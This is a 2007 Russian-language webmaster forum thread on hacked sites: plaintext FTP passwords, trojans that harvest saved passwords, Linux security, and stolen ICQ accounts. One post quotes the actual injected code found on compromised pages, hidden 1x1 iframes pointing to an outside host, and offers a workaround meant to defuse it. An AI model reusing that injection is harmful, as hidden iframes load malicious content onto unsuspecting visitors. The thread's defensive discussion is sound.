Старый 04.09.2007, 10:33   #31
Специалист
 
Аватар для sova
 
Регистрация: 18.08.2007
Адрес: Минск
Сообщений: 262
Вес репутации: 170
sova - весьма и весьма положительная личностьsova - весьма и весьма положительная личность
По умолчанию

ЗЫ по поводу ftp клиентов, ломают не шифрование паролей в записной книжке или самом клиенте, а снимают пароль в чистом виде на стадии подключения к серверу
Пароль идет в открытом виде
Поэтому если у вас есть доступ к каталогу сайта по ssh то надо использовать его и scp (secure copy).
sova вне форума   Ответить с цитированием
Старый 04.09.2007, 10:36   #32
Специалист
 
Аватар для товарисч
 
Регистрация: 07.08.2007
Адрес: Made in USSR
Сообщений: 321
Вес репутации: 0
товарисч не любят в этих краяхтоварисч не любят в этих краях
Отправить сообщение для товарисч с помощью ICQ
По умолчанию

для этого надо сидеть на канале между клиентом и сервером.
Если клиент не по WiFi нешифрованному сидит - то такое возможно только провайдером.
а там другая грабля - на инетрфейсе нереально много пакетов... заколебёшься внужные искать.
хотя - всё автоматизируется
товарисч вне форума   Ответить с цитированием
Старый 04.09.2007, 10:41   #33
Специалист
 
Аватар для sova
 
Регистрация: 18.08.2007
Адрес: Минск
Сообщений: 262
Вес репутации: 170
sova - весьма и весьма положительная личностьsova - весьма и весьма положительная личность
По умолчанию

Цитата:
Сообщение от товарисч Посмотреть сообщение
для этого надо сидеть на канале между клиентом и сервером.
Если клиент не по WiFi нешифрованному сидит - то такое возможно только провайдером.
а там другая грабля - на инетрфейсе нереально много пакетов... заколебёшься внужные искать.
хотя - всё автоматизируется

Так троян и будет прокладкой между тобой и сервером в одной сети
Я говорю что нафиг заморачиваться с расшифровками всякими если пароль и так идет открытым видом =)

Зы
если кому интересно почитайте тут как использовать ssh
http://sova.unica.by/doc/ssh/
вопросы будут задавайте

Последний раз редактировалось sova; 04.09.2007 в 10:43.
sova вне форума   Ответить с цитированием
Старый 04.09.2007, 11:53   #34
Эксперт
 
Аватар для seocore
 
Регистрация: 18.06.2007
Адрес: Картофель
Сообщений: 2,417
Вес репутации: 316
seocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущееseocore - прекрасное будущее
По умолчанию

Цитата:
Сообщение от sova Посмотреть сообщение
ЗЫ по поводу ftp клиентов, ломают не шифрование паролей в записной книжке или самом клиенте, а снимают пароль в чистом виде на стадии подключения к серверу
Пароль идет в открытом виде
Поэтому если у вас есть доступ к каталогу сайта по ssh то надо использовать его и scp (secure copy).
что вы паритесь, смех один:
1) троян просто достает пароли из .ini файла Total Commander'а в корне винды
2) кроме этого троян берет пароли аськи и все что в компе есть, включая даже менеджеры паролей FF и Оперы

поймите если пароль где-то записан в компе - то это уже не секьюрно по той причине - что профи просто проанализировав механизм работы менеджера паролей той или иной программы - довольно быстро напишут механизм декодирования этих паролей

по поводу троянов, вирусов и т.п. - Линух, БЗДя и прочие nix'ы такая же хорошая среда для них, просто в виду своей непопулярности в народе эту среду не облюбовали вирусо-трояно писатели ...

кстати - рекурсивно удалить файлы на всем диске можно в линухе, более того можно тупо устроить рекурсивно chmod на / с соответствующими правами, чтобы уложить всю машину...

по поводу дыр - так их полно в линухе, буквально каждую неделю открывают новую дыру которая позволяет простому юзеру получить рутовые права, так что по поводу безопасности не надо грузить народ
__________________
Инструменты для веб-мастера: кластеризатор СЯ, все запросы конкурента, XML-лимиты для плагина Wink'а
seocore вне форума   Ответить с цитированием
Старый 04.09.2007, 14:33   #35
Администратор
 
Аватар для Ank
 
Регистрация: 05.02.2007
Сообщений: 18,407
Вес репутации: 676
Ank - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущее
По умолчанию

Так. В курилку - оба.
__________________
Начать зарабатывать на своих сайтах. Консультирую своих рефов по аське

Читаем ФАК
Ank вне форума   Ответить с цитированием
Старый 05.09.2007, 10:27   #36
Велес
 
Аватар для Veles
 
Регистрация: 01.07.2007
Адрес: Россия
Сообщений: 1,422
Вес репутации: 225
Veles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущее
По умолчанию

Цитата:
Сообщение от mysql Посмотреть сообщение
Доброго времени!

Имею ряд сайтов, подключенных к всеми уважаемой системе SAPE.
Но 2 дня назад обнаружил интересную вещь: почти на всех этих сайтах в конец файлов index.html, index.htm, index.php (где что есть) кем-то был добавлен следующий код после тэга </HTML>:
Код:
<iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe><iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe>
Соответственно, при заходе на страницы сайтов это код прокачивает партнерки гугла, бегуна и т.п...
Для профилактики можно поставить на страницах сразу (без пробелов) после тега </html>

<noindex><a href="http://etosaglushkaprotivtrojanov.com/" rel="nofollow">этозаглушкапротиврекламныхтроянов

Без закрывающего тега </a>. И любые <!-- 0123456789 --> сами себя закроют. А Яндекс <noindex> без закрышки исполняет.

Или какой-нибудь скрипт, типа
<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
web = "http://www";
site = "etosaglushkaprotivtrojanov.com";
document.write('<a target=_blank href=\"' + web + '.' + site + '\">');
document.write(web + '.' + site + '</a>');

бла-бла-бла

// End --></SCRIPT>

Троян в него должен ввалиться.
Да, много чего можно придумать, чтобы каждый день индексы не шерстить.
__________________
Wish You Were Here...
Veles вне форума   Ответить с цитированием
Старый 13.09.2007, 22:19   #37
Специалист
 
Аватар для maxispeed
 
Регистрация: 10.09.2007
Сообщений: 157
Вес репутации: 166
maxispeed скоро станет известен
По умолчанию

Если админы не сочтут рекламой.....
про лечение и защиту от вирусов хорошо могут объяснить тут www.virusinfo.info я уже раза 3 к ним попадал (последний раз вчера из за описаного мной в теме Вирусы вирусы)

К админам: сорри если здесь это считается рекламой.
maxispeed вне форума   Ответить с цитированием
Старый 28.10.2007, 20:02   #38
Новичок
 
Регистрация: 28.10.2007
Сообщений: 2
Вес репутации: 0
sergun4ik на пути к лучшему
По умолчанию

когда меня посетила сея беда, на форуме одном непомню каком нашел запись что наехали на одного чела что я кобы он давал объявы что продает ифрейм для загрузки.

(50баков за 1000 чтоли)

вобщем бало на этом рубят
и пока будут бабло платить за загрузку на ничегонеподозревающего пк юзера будут такие трояны и будут у нас проблемы.

и кода фтп все перекроют и не будут пароли капать на их мыло то
кодеры будут массово переходить на популярные движки и вставлять свой злой код прямо в дырку вашего двига и при этом не воруя у нас ни чего.
sergun4ik вне форума   Ответить с цитированием
Старый 28.10.2007, 23:13   #39
Специалист
 
Аватар для windtalker
 
Регистрация: 06.09.2007
Сообщений: 209
Вес репутации: 168
windtalker на пути к лучшему
По умолчанию

эмм .... а как же Linux ? имхо панацея ...
windtalker вне форума   Ответить с цитированием
Старый 28.10.2007, 23:17   #40
Специалист
 
Регистрация: 16.05.2007
Сообщений: 371
Вес репутации: 178
muxa - луч света в тёмном царствеmuxa - луч света в тёмном царствеmuxa - луч света в тёмном царствеmuxa - луч света в тёмном царствеmuxa - луч света в тёмном царстве
Wink

Цитата:
Сообщение от windtalker Посмотреть сообщение
эмм .... а как же Linux ? имхо панацея ...
ага, есть у меня знакомый пингвиноид

от него давеча по аське пришла просьба послать СМС на короткий номер типа что-то получитьв ответ и пересдать ему.

вы уж прсотите несчастного маздайщика, но не верю я такие чудеса.

сразу позвонил по телефоне, а он такой грустный... аську видители спёрли.

такая вот поучительная история
muxa вне форума   Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 05:53.